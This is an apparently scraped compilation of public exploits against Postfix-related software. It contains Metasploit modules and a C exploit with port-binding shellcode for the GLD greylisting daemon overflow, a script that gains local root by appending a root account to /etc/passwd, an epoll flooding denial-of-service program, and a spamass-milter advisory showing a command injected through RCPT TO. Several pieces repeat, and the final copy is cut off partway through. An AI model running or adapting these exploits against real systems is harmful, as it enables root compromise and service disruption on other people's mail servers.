postfix

##
# $Id: gld_postfix.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


	class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
			'Description'	=> %q{
				This module exploits a stack buffer overflow in the Salim Gasmi
				GLD <= 1.4 greylisting daemon for Postfix. By sending an
				overly long string the stack can be overwritten.
			},
			'Version'	=> '$Revision: 9669 $',
			'Author'	=> [ 'patrick' ],
			'Arch'		=> ARCH_X86,
			'Platform'	=> 'linux',
			'References'	=>
				[
					[ 'CVE', '2005-1099' ],
					[ 'OSVDB', '15492' ],
					[ 'BID', '13129' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/934' ],
				],
			'Privileged'	=> true,
			'License'	=> MSF_LICENSE,
			'Payload'	=>
				{
					'Space' => 1000,
					'BadChars' => "\x00\x0a\x0d\x20=",
					'StackAdjustment' => -3500,
				},
			'Targets'	=>
				[
					[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
				],
			'DefaultTarget'	=> 0,
			'DisclosureDate'  => 'Apr 12 2005'
		))

		register_options(
			[
				Opt::RPORT(2525)
			],
			self.class
		)
	end

	def exploit
		connect

		sploit = "sender="+ payload.encoded + "\r\n"
		sploit << "client_address=" + [target['Ret']].pack('V') * 300 + "\r\n\r\n"

		sock.put(sploit)
		handler
		disconnect

	end

end

#!/bin/sh
#
# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@rs-labs.com>
#
# Tested: Ubuntu / Debian
#
# [ Madrid, 30.Aug.2008 ]
#

# Config

writable_dir=/tmp
spool_dir=/var/mail		# Use "postconf mail_spool_directory" to obtain this
user=root
target=/etc/passwd
useful_link=/usr/bin/atq	# lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at
useful_link_dst=at		# Tip: find / -type l -uid 0 -print -exec ls -l {} \; | less
seconds=3
user_in_passwd="dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh"   # Pass is "dsrrocks"
postfix=`which postfix`		# /usr/sbin/postfix
postconf=/usr/sbin/postconf
postmap=/usr/sbin/postmap


# Funcs

quit()
{
  echo "$1"
  exit
}


# Step 1: is my system vulnerable?

head -n 9 $0 | tail -n 8
if [ $postfix ] ; then
  echo "[*] Postfix seems to be installed"
else
  quit "[!] Are you sure Postfix is installed?"
fi

mkdir -p $writable_dir/pocfix
touch $writable_dir/pocfix/src
ln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1
ln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2

if [ -L $writable_dir/pocfix/dst2 ] ; then
  echo "[*] Hardlink to symlink not dereferenced"
  rm -rf $writable_dir/pocfix
else
  rm -rf $writable_dir/pocfix
  quit "[!] Hardlink to symlink correctly dereferenced. System is not vulnerable"
fi

if [ -d $spool_dir -a -w $spool_dir ] ; then
  echo "[*] Spool dir is writable"
else
  quit "[!] Spool dir is not writable"
fi

if [ -e $spool_dir/$user ] ; then
  rm -f $spool_dir/$user
  echo "[*] Mailbox for \"$user\" found. Trying to delete it"

  if [ -e $spool_dir/$user ] ; then
    quit "[!] Couldn't delete it"
  else
    echo "[*] Deletion ok"
  fi

fi

if [ -e $spool_dir/$useful_link_dst ] ; then
  rm -f $spool_dir/$useful_link_dst
  echo "[*] Mailbox for \"$useful_link_dst\" found. Trying to delete it"

  if [ -e $spool_dir/$useful_link_dst ] ; then
    quit "[!] Couldn't delete it"
  else
    echo "[*] Deletion ok"
  fi

fi

aliases=`$postconf alias_database | cut -d"=" -f2`
$postconf alias_maps | grep -q $aliases
if [ $? -eq 0 ] ; then
  if [ $aliases ] ; then
    $postmap -q $user $aliases > /dev/null
    if [ $? -eq 0 ] ; then
      quit "[!] Mail alias for \"$user\" exists"
    fi
  fi
fi

lda=`$postconf mailbox_command | cut -d"=" -f2`
if [ $lda ] ; then
  quit "[!] Non-Postfix LDA detected"
fi 

$postconf home_mailbox | grep -q '/$'
if [ $? -eq 0 ] ; then
  quit "[!] Maildir-style mailbox detected"
fi


# Step 2: Exploiting

ln -f $useful_link $spool_dir/$user 2> /dev/null || quit "[!] Couldn't create hardlink (different partitions?)"
ln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit "[!] Couldn't create symlink pointing to target file"
cp -f $target $writable_dir/pocfix_target_backup.$$ && echo "[*] Backed up: $target (saved as \"$writable_dir/pocfix_target_backup.$$\")"
echo "[*] Sending mail ($seconds seconds wait)"
echo $user_in_passwd | /usr/sbin/sendmail $user

sleep $seconds

diff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null

if [ $? -eq 0 ] ; then
  echo "[!] Exploit failed"
else
  echo "[*] Exploit successful (appended data to $target). Now \"su dsr\", pass is \"dsrrocks\")"
fi

rm -f $spool_dir/$user
rm -f $spool_dir/$useful_link_dst

# milw0rm.com [2008-08-31]

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


	class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
			'Description'	=> %q{
				This module exploits a stack overflow in the Salim Gasmi
				GLD <= 1.4 greylisting daemon for Postfix. By sending an
				overly long string the stack can be overwritten.
			},
			'Version'	=> '$Revision$',
			'Author'	=> [ 'patrick' ],
			'Arch'		=> ARCH_X86,
			'Platform'	=> 'linux',
			'References'	=>
				[
					[ 'CVE', '2005-1099' ],
					[ 'OSVDB', '15492' ],
					[ 'BID', '13129' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/934' ],
				],
			'Privileged'	=> true,
			'License'	=> MSF_LICENSE,
			'Payload'	=>
				{
					'Space' => 1000,
					'BadChars' => "\x00\x0a\x0d\x20=",
					'StackAdjustment' => -3500,
				},
			'Targets'	=>
				[
					[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
				],
			'DefaultTarget'	=> 0
		))

		register_options(
			[
				Opt::RPORT(2525)
			],
			self.class
		)
	end
	
	def exploit
		connect

		sploit = "sender="+ payload.encoded + "\r\n"
		sploit << "client_address=" + [target['Ret']].pack('V') * 300 + "\r\n\r\n"

		sock.put(sploit)
		handler
		disconnect

	end

end

/*
**
**
** 0x82-meOw-linuxer_forever - gld 1.4 remote overflow format string exploit.
** (c) 2005 Team INetCop Security.
**
** Nickname of this code is,
** `Kill two bird with one stone.' or, `One shot, two kill!.'
** hehehe ;-D
**
** Advisory URL: 
** http://x82.inetcop.org/h0me/adv1sor1es/INCSA.2005-0x82-026-GLD.txt
**
** It's as well as RedHat Linux and to gentoo, debian Linux, *BSD.
** You can develop for your flatform.
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.inetcop.org
**
**
** P.S: My domain x82.i21c.net encountered compulsion withdrawal from the country.
** They are killing many hackers of the Korea. hehehe ;-p
**
*/
/*
**
** These days, the main issue that strikes Korea is small rocky island "Dokdo".
** You can get more detailed information from following websites.
**
** "Japanese goverment has to follow and learn from German goverment"
**
** I can confidently say "Dokdo is belong to Korea".
**
** (1) reference 
**
** 1) Their claim that the East Sea has some historical precedent worked,
** as some major book and map publishers, educational web sites and other
** reference materials now include the East Sea name along with the Sea of Japan.
** - worldatlas.com-
**
** http://www.worldatlas.com/webimage/countrys/asia/eastsea.htm
**
** 2) On historical perspective and in international law, why there
** is no valid dispute over the ownership of Dokdo.
**
** http://www.prkorea.com/english/textbook/ge03.html
**
** 3)Truth in scholarship
**
** http://www.prkorea.com/english/textbook/maintruth.html
**
**
*/

#include <stdio.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define DEF_HOST "localhost"
#define PORT 2525

struct os_t {
int number;
char *os_type;
unsigned long dtors_addr;
unsigned long shell;
int sflag;
};

struct os_t platform[]={
{
0,"Red Hat Linux release 7.0 (Guinness) gld 1.4 (format string exploit)",
0x0804db98,0xbfffa3bc,15
},
{
1,"Red Hat Linux release 9 (Shrike) gld 1.4 (format string exploit)",
0x0804d14c,0x0805506e,15
},
{
2,"Red Hat Linux release 7.0 (Guinness) gld 1.4 (buffer overflow exploit)",
0,0xbfffa5d8,300
},
{
/* jmp *%esp method */
3,"Red Hat Linux release 9 (Shrike) gld 1.4 (buffer overflow exploit)",
0,0x4212c5eb,254
},
{
4,NULL,0,0,0
}
};

int __debug_chk=0;
char t_atk[0xfff*3];
// This is lovable shellcode, that's sweet in linux platform. 
char shellcode[]= /* portshell shellcode, 128 bytes (tcp/36864) */
"\xeb\x72\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\x43\xc6\x46\x10\x10\x66\x89"
"\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89\x46\x18\xb0\x90\x66\x89"
"\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0\x66\xcd\x80\x89"
"\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89\x56\x10\xb0\x66"
"\x43\xcd\x80\x86\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd\x80"
"\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89\x76\x0c\x87\xf3\x8d\x4b\x0c"
"\xb0\x0b\xcd\x80\xe8\x89\xff\xff\xff/bin/sh";

void banrl();
int make_bof_code(unsigned long shell,int size,int type);
int make_fmt_code(unsigned long retloc,unsigned long shell,int sflag);
int setsock(char *host,int port);
void usage(char *args);
void re_connt(int sock);
void conn_shell(int sock);

int main(int argc,char *argv[])
{
int sock,type=0;
int port=(PORT);
char host[256]=DEF_HOST;

int sflag=platform[type].sflag;
unsigned long retloc=platform[type].dtors_addr;
unsigned long shell=platform[type].shell;

(void)banrl();
while((sock=getopt(argc,argv,"DdF:f:R:r:S:s:H:h:T:t:Ii"))!=EOF) {
extern char *optarg;
switch(sock) {
case 'D':
case 'd':
__debug_chk=1;
break;
case 'R':
case 'r':
retloc=strtoul(optarg,NULL,0);
break;
case 'S':
case 's':
shell=strtoul(optarg,NULL,0);
break;
case 'F':
case 'f':
sflag=atoi(optarg);
break;
case 'H':
case 'h':
memset((char *)host,0,sizeof(host));
strncpy(host,optarg,sizeof(host)-1);
break;
case 'T':
case 't':
type=atoi(optarg);
if(type>=4){
(void)usage(argv[0]);
} else {
retloc=platform[type].dtors_addr;
shell=platform[type].shell;
sflag=platform[type].sflag;
}
break;
case 'I':
case 'i':
(void)usage(argv[0]);
break;
case '?':
fprintf(stderr,"Try `%s -i' for more information.\n\n",argv[0]);
exit(-1);
break;
}
}

fprintf(stdout," #\n # target host: %s:%d\n",host,port);
fprintf(stdout," # type: %s\n",platform[type].os_type);
switch(type)
{
case 0:
case 1:
(int)make_fmt_code(retloc,shell,sflag);
break;
case 2:
(int)make_bof_code(shell,sflag,0);
break;
case 3:
(int)make_bof_code(shell,sflag,1);
}

fprintf(stdout," # send code size: %d byte\n",strlen(t_atk));
sock=setsock(host,port);
(void)re_connt(sock);

if(__debug_chk) sleep(10);

send(sock,t_atk,strlen(t_atk),0);
close(sock);

fprintf(stdout," #\n # Waiting rootshell, Trying %s:36864 ...\n",host);
sleep(1);
sock=setsock(host,36864);
(void)re_connt(sock);

fprintf(stdout," # connected to %s:36864 !\n #\n\n",host);
(void)conn_shell(sock);
}

int make_bof_code(unsigned long shell,int size,int type)
{
int a,b;
char nop_shell[8192];
char code_buf[4096];

memset((char *)nop_shell,0,sizeof(nop_shell));
memset((char *)code_buf,0,sizeof(code_buf));
memset((char *)t_atk,0,sizeof(t_atk));

switch(type)
{
case 0:
fprintf(stdout," # method: normal overflow exploit: %d byte\n",size);
/* sender buffer = nop, shellcode */
for(a=0;a<1000-strlen(shellcode);a++)
nop_shell[a]='N';
for(b=0;b<strlen(shellcode);b++)
nop_shell[a++]=shellcode[b];
/* client_address = retaddr */
for(b=0;b<size*4;b+=4)
*(long *)&code_buf[b]=shell;

snprintf(t_atk,sizeof(t_atk)-1,
"sender=%s\r\n"
"client_address=%s\r\n\r\n",nop_shell,code_buf);
break;

case 1:
fprintf(stdout," # method: jmp *%%esp exploit: %d byte\n",size);
/* sender buffer */
for(a=0;a<1000;a++)
nop_shell[a]='N';
/* client_address buffer */
for(b=0;b<size*4;b+=4)
*(long *)&code_buf[b]=0x82828282;
/* ebp */
*(long *)&code_buf[b]=0x41414141;
b+=4;
/* eip (jmp *%esp) */
*(long *)&code_buf[b]=(shell);
b+=4;
/* jmp nop (0xeb,0x08) */
*(long *)&code_buf[b]=0x08eb08eb;
b+=4;
/* dummy, nop */
// 0x0804d280 0xbfffe1c8 0x08049521
*(long *)&code_buf[b]=0x0804d280;
b+=4;
*(long *)&code_buf[b]=0x90909090;//0xbfffe1c8;
b+=4;
*(long *)&code_buf[b]=0x90909090;//0x08049521;
b+=4;
*(long *)&code_buf[b]=0x90909090;
b+=4;
/* shellcode */
for(a=0;a<strlen(shellcode);a++)
code_buf[b++]=shellcode[a];

snprintf(t_atk,sizeof(t_atk)-1,
"sender=%s\r\n"
"client_address=%s\r\n\r\n",nop_shell,code_buf);
}
}

int make_fmt_code(unsigned long retloc,unsigned long shell,int sflag)
{
unsigned char header[256];
unsigned char nop_shell[8192];
int a,b,c,d,e,f;
int addr1,addr2,addr3,addr4;
a=b=c=d=e=f=addr1=addr2=addr3=addr4=0;

memset((char *)header,0,sizeof(header));
memset((char *)nop_shell,0,sizeof(nop_shell));
memset((char *)t_atk,0,sizeof(t_atk));

fprintf(stdout," # Make format string, .dtors: %p\n",retloc);

*(long *)&header[0]=retloc+0;
*(long *)&header[4]=retloc+1;
*(long *)&header[8]=retloc+2;
*(long *)&header[12]=retloc+3;

a=(shell>>24)&0xff;
addr1=(shell>>24)&0xff;
b=(shell>>16)&0xff;
addr2=(shell>>16)&0xff;
c=(shell>>8)&0xff;
addr3=(shell>>8)&0xff;
d=(shell>>0)&0xff;
addr4=(shell>>0)&0xff;

if((addr4-16-65)<10)d+=0x100;
if((addr3-addr4)<10)c+=0x100;
if((addr2-addr3)<10)b+=0x100;

for(e=0;e<320-strlen(shellcode);e++)
nop_shell[e]='N';
for(f=0;f<strlen(shellcode);f++)
nop_shell[e++]=shellcode[f];

fprintf(stdout," #\n # shellcode addr: %p, size: %d byte\n",shell,strlen(nop_shell));
snprintf(t_atk,sizeof(t_atk)-1,
"client_address=%s" /* header */
"%%%ux%%%d$n%%%ux%%%d$n%%%ux%%%d$n%%%ux%%%d$n" /* fmt code */
"%s\r\n\r\n", /* shellcode */
header,d-16-65,(sflag+0),c-addr4,(sflag+1),b-addr3,
(sflag+2),0x100+a-addr2,(sflag+3),nop_shell);
}

void re_connt(int sock)
{
if(sock==-1)
{
fprintf(stdout," #\n # Failed.\n");
fprintf(stdout," # Happy Exploit ! :-)\n #\n\n");
exit(-1);
}
}

int setsock(char *host,int port)
{
int sock;
struct hostent *he;
struct sockaddr_in x82_addr;

if((he=gethostbyname(host))==NULL)
{
herror(" # gethostbyname() error");
return(-1);
}

if((sock=socket(AF_INET,SOCK_STREAM,0))==EOF)
{
perror(" # socket() error");
return(-1);
}

x82_addr.sin_family=AF_INET;
x82_addr.sin_port=htons(port);
x82_addr.sin_addr=*((struct in_addr *)he->h_addr);
bzero(&(x82_addr.sin_zero),8);

if(connect(sock,(struct sockaddr *)&x82_addr,sizeof(struct sockaddr))==EOF)
{
perror(" # connect() error");
return(-1);
}
return(sock);
}

void conn_shell(int sock)
{
int pckt;
char *cmd="uname -a;id;export TERM=vt100;exec bash -i\n";
char rbuf[1024];
fd_set rset;
memset((char *)rbuf,0,1024);

fprintf(stdout," #\n # Kill two bird with one stone!\n");
fprintf(stdout," # OK, It's Rootshell\n #\n\n");
send(sock,cmd,strlen(cmd),0);

while(1)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,NULL);

if(FD_ISSET(sock,&rset))
{
pckt=read(sock,rbuf,1024);
if(pckt<=0)
{
fprintf(stdout," #\n # Happy Exploit !\n #\n\n");
exit(0);
}
rbuf[pckt]=0;
printf("%s",rbuf);
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
pckt=read(STDIN_FILENO,rbuf,1024);
if(pckt>0)
{
rbuf[pckt]=0;
write(sock,rbuf,pckt);
}
}
}
return;
}

void banrl()
{
fprintf(stdout,"\n #\n # 0x82-meOw_linuxer_forever - 
Greylisting daemon for Postfix remote exploit\n");
fprintf(stdout," # szoahc(at)hotmail(dot)com\n #\n\n");
}

void usage(char *args)
{
int i;
fprintf(stdout," Usage: %s -options arguments\n\n",args);
fprintf(stdout,"\t-r [retloc] - .dtors address.\n");
fprintf(stdout,"\t-s [shell] - shellcode address.\n");
fprintf(stdout,"\t-f [flag num] - $-flag count.\n");
fprintf(stdout,"\t-h [host] - target hostname.\n");
fprintf(stdout,"\t-t [type num] - target number.\n");
fprintf(stdout,"\t-i - help information.\n\n");

fprintf(stdout," - Target Type Number List -\n\n");
for(i=0;platform[i].os_type!=NULL;i++)
{
fprintf(stdout," {%d} : %s\n",i,platform[i].os_type);
}
fprintf(stdout,"\n Example: %s -t 0 -h localhost\n",args);
fprintf(stdout," Example: %s -r 0x82828282 -s 0x82828282 -f 15\n\n",args);
exit(0);
}

// milw0rm.com [2005-04-13]

/*
 * http://www.wekk.net/research/CVE-2008-4042/CVE-2008-4042-exploit.c
 * http://www.wekk.net/research/CVE-2008-3889/CVE-2008-3889-exploit.c
 *
 * Exploit for Postfix 2.4 before 2.4.9, 2.5 before 2.5.5, and 2.6 
 * before 2.6-20080902, when used with the Linux 2.6 kernel.
 *
 * CVE-2008-3889 & CVE-2008-4042
 *
 * by Albert Sellarès <whats[at]wekk[dot]net> - http://www.wekk.net
 * and Marc Morata Fité <marc.morata.fite[at]gmail[dot]com> 
 * 2008-09-16
 *
 * This Proof of concept creates a pipe and adds it in the postfix's epoll 
 * file descriptor.
 * When the pipe is added, an endless loop will launch lots of events to the 
 * local and master postfix processes. 
 * This will slowdown de system a lot.
 *
 * An example of use:
 * 1- Put the content "| ~/CVE-2008-3889-exploit >> /tmp/postfix.log &" (with 
 * the double quotes) 
 * in the file ~/.forward
 *
 * 2- Put the CVE-2008-4042-exploit in your home
 * gcc CVE-2008-3889-exploit.c -o CVE-2008-3889-exploit
 *
 * 3- Send and email to the user
 *
 * You can see the output at /tmp/postfix.log
 */


#include <sys/epoll.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dirent.h>
#include <errno.h>

#define FDOPEN 200


void add_fd(int fde, int fd) {
	printf("[*] Adding fd %d to eventpoll %d\n", fd, fde);
	static struct epoll_event ev;
	ev.events = EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP|EPOLLET;
	errno =0;
	// If this is a socket fd, the load is high
	ev.data.u32 = 6;
	ev.data.u64 = 6;

	if (epoll_ctl(fde, EPOLL_CTL_ADD, fd, &ev) == 0) {
		printf(" => Fd %d added!\n", fd);
	} else {
		printf(" => Error (%d) adding fd %d\n", errno, fd);
	}
}

int main(int argc, char *argv[]) {

	int fds[2];
	char dir[32], c;
	int i, found = 0;

	pipe(fds);
	sprintf(dir, "/proc/%d/fd", getpid());
	printf("[*] Opening directory %s\n", dir);
	DIR *fd_dir = opendir(dir);
	struct dirent *de = readdir(fd_dir);

	// We are looking for the eventpoll file descriptor
	while (de != NULL) {
		char link_d[256];
		char link_f[256];
		memset(link_d, 0, 256);
		sprintf(link_f, "%s/%s", dir, de->d_name);
		readlink(link_f, link_d, 256);
		if ( strstr(link_d, "eventpoll") ) {
			found = 1;
			printf(" => %s points to %s\n", de->d_name, link_d);
			add_fd(atoi(de->d_name), fds[0]);
			// We can test with more than one triggered event at once
			for (i = 0; i<FDOPEN; i++)
				add_fd(atoi(de->d_name),dup(fds[0]));
		}
		de = readdir(fd_dir);
	}
	closedir(fd_dir);
	
	if (found == 0) {
		printf("[!] Are you sure that your postfix is vulnerable?\n");
		printf("[!] Are you launching me throw a .forward file?\n");
		exit(0);
	}
	
	printf("[*] Starting to flood the system!\n");
	fflush(stdout);
	close(0);
	close(1);
	close(2);

	// This triggers the events
	while (1) {
		write(fds[1], "A",1);
		read(fds[0],&c, 1);
	}

	return 0;
}

// milw0rm.com [2008-09-16]

#!/bin/sh
#
# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@rs-labs.com>
#
# Tested: Ubuntu / Debian
#
# [ Madrid, 30.Aug.2008 ]
#

# Config

writable_dir=/tmp
spool_dir=/var/mail    # Use "postconf mail_spool_directory" to obtain this
user=root
target=/etc/passwd
useful_link=/usr/bin/atq  # lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at
useful_link_dst=at    # Tip: find / -type l -uid 0 -print -exec ls -l {} \; | less
seconds=3
user_in_passwd="dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh"   # Pass is "dsrrocks"
postfix=`which postfix`    # /usr/sbin/postfix
postconf=/usr/sbin/postconf
postmap=/usr/sbin/postmap


# Funcs

quit()
{
  echo "$1"
  exit
}


# Step 1: is my system vulnerable?

head -n 9 $0 | tail -n 8
if [ $postfix ] ; then
  echo "[*] Postfix seems to be installed"
else
  quit "[!] Are you sure Postfix is installed?"
fi

mkdir -p $writable_dir/pocfix
touch $writable_dir/pocfix/src
ln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1
ln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2

if [ -L $writable_dir/pocfix/dst2 ] ; then
  echo "[*] Hardlink to symlink not dereferenced"
  rm -rf $writable_dir/pocfix
else
  rm -rf $writable_dir/pocfix
  quit "[!] Hardlink to symlink correctly dereferenced. System is not vulnerable"
fi

if [ -d $spool_dir -a -w $spool_dir ] ; then
  echo "[*] Spool dir is writable"
else
  quit "[!] Spool dir is not writable"
fi

if [ -e $spool_dir/$user ] ; then
  rm -f $spool_dir/$user
  echo "[*] Mailbox for \"$user\" found. Trying to delete it"

  if [ -e $spool_dir/$user ] ; then
    quit "[!] Couldn't delete it"
  else
    echo "[*] Deletion ok"
  fi

fi

if [ -e $spool_dir/$useful_link_dst ] ; then
  rm -f $spool_dir/$useful_link_dst
  echo "[*] Mailbox for \"$useful_link_dst\" found. Trying to delete it"

  if [ -e $spool_dir/$useful_link_dst ] ; then
    quit "[!] Couldn't delete it"
  else
    echo "[*] Deletion ok"
  fi

fi

aliases=`$postconf alias_database | cut -d"=" -f2`
$postconf alias_maps | grep -q $aliases
if [ $? -eq 0 ] ; then
  if [ $aliases ] ; then
    $postmap -q $user $aliases > /dev/null
    if [ $? -eq 0 ] ; then
      quit "[!] Mail alias for \"$user\" exists"
    fi
  fi
fi

lda=`$postconf mailbox_command | cut -d"=" -f2`
if [ $lda ] ; then
  quit "[!] Non-Postfix LDA detected"
fi 

$postconf home_mailbox | grep -q '/$'
if [ $? -eq 0 ] ; then
  quit "[!] Maildir-style mailbox detected"
fi


# Step 2: Exploiting

ln -f $useful_link $spool_dir/$user 2> /dev/null || quit "[!] Couldn't create hardlink (different partitions?)"
ln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit "[!] Couldn't create symlink pointing to target file"
cp -f $target $writable_dir/pocfix_target_backup.$$ &amp;&amp; echo "[*] Backed up: $target (saved as \"$writable_dir/pocfix_target_backup.$$\")"
echo "[*] Sending mail ($seconds seconds wait)"
echo $user_in_passwd | /usr/sbin/sendmail $user

sleep $seconds

diff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null

if [ $? -eq 0 ] ; then
  echo "[!] Exploit failed"
else
  echo "[*] Exploit successful (appended data to $target). Now \"su dsr\", pass is \"dsrrocks\")"
fi

rm -f $spool_dir/$user
rm -f $spool_dir/$useful_link_dst

Description: The Spamassassin Milter plugin suffers from a remote root command execution vulnerability. Full exploit details provided.
Author:	Kingcope

Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the
shadows not HERE)
aka the postfix_joker advisory

Logic fuckup?

March 07 2010 // if you read this 10 years later you are definetly
seeking the nice 0days!

Greetz fly out to alex,andi,adize :D
+++ KEEP IT ULTRA PRIV8 +++

Software
+-+-+-+-+
Apache Spamassassin
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.

SpamAssassin is a project of the Apache Software Foundation (ASF).

Postfix
What is Postfix? It is Wietse Venema's mailer that started life at IBM
research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is
completely different.

Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.

Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied 
recipient (RCPT TO).

>From spamass-milter-0.3.1 (-latest) Line 820:

//
// Gets called once for each recipient
//
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)
//

sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
        struct context *sctx = (struct context*)smfi_getpriv(ctx);
        SpamAssassin* assassin = sctx->assassin;
        FILE *p;
#if defined(__FreeBSD__)
        int rv;
#endif

        debug(D_FUNC, "mlfi_envrcpt: enter");

        if (flag_expand)
        {
                /* open a pipe to sendmail so we can do address
expansion */

                char buf[1024];
                char *fmt="%s -bv \"%s\" 2>&1";

#if defined(HAVE_SNPRINTF)
                snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
                /* XXX possible buffer overflow here // is this a
joke ?! */
                sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif

                debug(D_RCPT, "calling %s", buf);

#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
                rv = pthread_mutex_lock(&popen_mutex);
                if (rv)
                {
                        debug(D_ALWAYS, "Could not lock popen mutex: %
s", strerror(rv));
                        abort();
                }
#endif

                p = popen(buf, "r");				[1]
                if (!p)
                {
                        debug(D_RCPT, "popen failed(%s).  Will not
expand aliases", strerror(errno));
                        assassin->expandedrcpt.push_back(envrcpt[0]);


[1] the vulnerable popen() call.

Remote Root Exploit PoC through postfix
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me@me.com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo

Signed,

Kingcope

Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the
shadows not HERE)
aka the postfix_joker advisory

Logic fuckup?

March 07 2010 // if you read this 10 years later you are definetly
seeking the nice 0days!

Greetz fly out to alex,andi,adize :D
+++ KEEP IT ULTRA PRIV8 +++

Software
+-+-+-+-+
Apache Spamassassin
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.

SpamAssassin is a project of the Apache Software Foundation (ASF).

Postfix
What is Postfix? It is Wietse Venema's mailer that started life at IBM
research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is
completely different.

Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.

Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied 
recipient (RCPT TO).

>From spamass-milter-0.3.1 (-latest) Line 820:

//
// Gets called once for each recipient
//
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)
//

sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
        struct context *sctx = (struct context*)smfi_getpriv(ctx);
        SpamAssassin* assassin = sctx->assassin;
        FILE *p;
#if defined(__FreeBSD__)
        int rv;
#endif

        debug(D_FUNC, "mlfi_envrcpt: enter");

        if (flag_expand)
        {
                /* open a pipe to sendmail so we can do address
expansion */

                char buf[1024];
                char *fmt="%s -bv \"%s\" 2>&1";

#if defined(HAVE_SNPRINTF)
                snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
                /* XXX possible buffer overflow here // is this a
joke ?! */
                sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif

                debug(D_RCPT, "calling %s", buf);

